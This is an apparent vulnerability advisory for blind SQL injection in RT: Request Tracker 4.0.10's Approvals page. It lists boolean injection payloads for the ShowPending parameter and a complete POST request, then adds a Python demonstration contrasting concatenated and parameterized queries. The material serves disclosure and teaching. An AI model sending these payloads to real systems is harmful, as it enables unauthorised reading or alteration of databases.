
RT: Request Tracker 4.0.10 SQL Injection

Posted on 11 April 2013

# Exploit Title: - SQL-Injection - RT: Request Tracker System
# Date: 10/05/2013
# Exploit Author: cheki
# Vendor Homepage: http://bestpractical.com/rt/
# Version: RT 4.0.10
# Tested on: Kali Linux
########################################################################################

URL: http://10.10.10.70/Approvals/
Entity: ShowPending (Parameter)
Risk: It is possible to view, modify or delete database entries and tables
Causes: Sanitation of hazardous characters was not performed correctly on user input
Fix: Review possible solutions for hazardous character injection

#Description: Blind SQL Injection: append Boolean True/False string expressions, using apostrophes and commenting out the rest of the query.

#The following changes were applied to the original request:
1) Set parameter 'ShowPending's value to '1%27+and+%27f%27%3D%27f%27%29+--+'
2) Set parameter 'ShowPending's value to '1%27+and+%27b%27%3D%27f%27%29+--'
3) Set parameter 'ShowPending's value to '1%27+or+%27b%27%3D%27f%27%29+--'

POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://10.10.10.70/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120

ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=

#########################################################################################

Reasoning: The test result seems to indicate a vulnerability because it shows that values can be appended to parameter values, indicating that they were embedded in an SQL query.
In this test, three (or sometimes four) requests are sent. The last is logically equal to the original, and the next-to-last is different. Any others are for control purposes. A comparison of the last two responses with the first (the last is similar to it, and the next-to-last is different) indicates that the application is vulnerable.

Home Page: securitylabnews.blogspot.com
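
The response comparison from the Reasoning and the direction given under Fix, as an added example that is not part of the original advisory and is not RT's code. The SQLite table, the query text and the flag allowlist are constructed assumptions (the page does not show RT's schema or SQL); only the ShowPending values come from the advisory.

```python
import sqlite3
from urllib.parse import parse_qs

def make_db():
    # Constructed stand-in table, not RT's schema.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE approvals (id INTEGER, pending TEXT)")
    db.executemany("INSERT INTO approvals VALUES (?, ?)",
                   [(1, "1"), (2, "1"), (3, "0")])
    return db

def ids_concatenated(db, show_pending):
    # Vulnerable pattern: the parameter is spliced into the SQL text, so an
    # apostrophe closes the literal and "--" discards the rest of the query.
    sql = ("SELECT id FROM approvals WHERE (pending = '" + show_pending +
           "') ORDER BY id")
    return sorted(row[0] for row in db.execute(sql))

def ids_parameterized(db, show_pending):
    # Hardened pattern: the value is bound and can only ever be compared as data.
    sql = "SELECT id FROM approvals WHERE (pending = ?) ORDER BY id"
    return sorted(row[0] for row in db.execute(sql, (show_pending,)))

def is_valid_flag(value):
    # Assumed allowlist for a checkbox-style parameter such as ShowPending.
    return value in ("", "0", "1")

def first_value(body, name):
    # Decode an application/x-www-form-urlencoded body and return one field.
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]

# Form bodies carrying the first two ShowPending values listed in the advisory.
TRUE_BODY = "ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1"
FALSE_BODY = "ShowPending=1%27+and+%27b%27%3D%27f%27%29+--&ShowResolved=1"

if __name__ == "__main__":
    db = make_db()
    for label, body in (("true", TRUE_BODY), ("false", FALSE_BODY)):
        value = first_value(body, "ShowPending")
        print(label, repr(value),
              "concatenated:", ids_concatenated(db, value),
              "parameterized:", ids_parameterized(db, value),
              "passes allowlist:", is_valid_flag(value))
```

With concatenation the "true" and "false" requests return different row sets, which is the difference the scanner's comparison relies on; with a bound parameter both return the same empty result, and the allowlist rejects both before any query runs.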

 
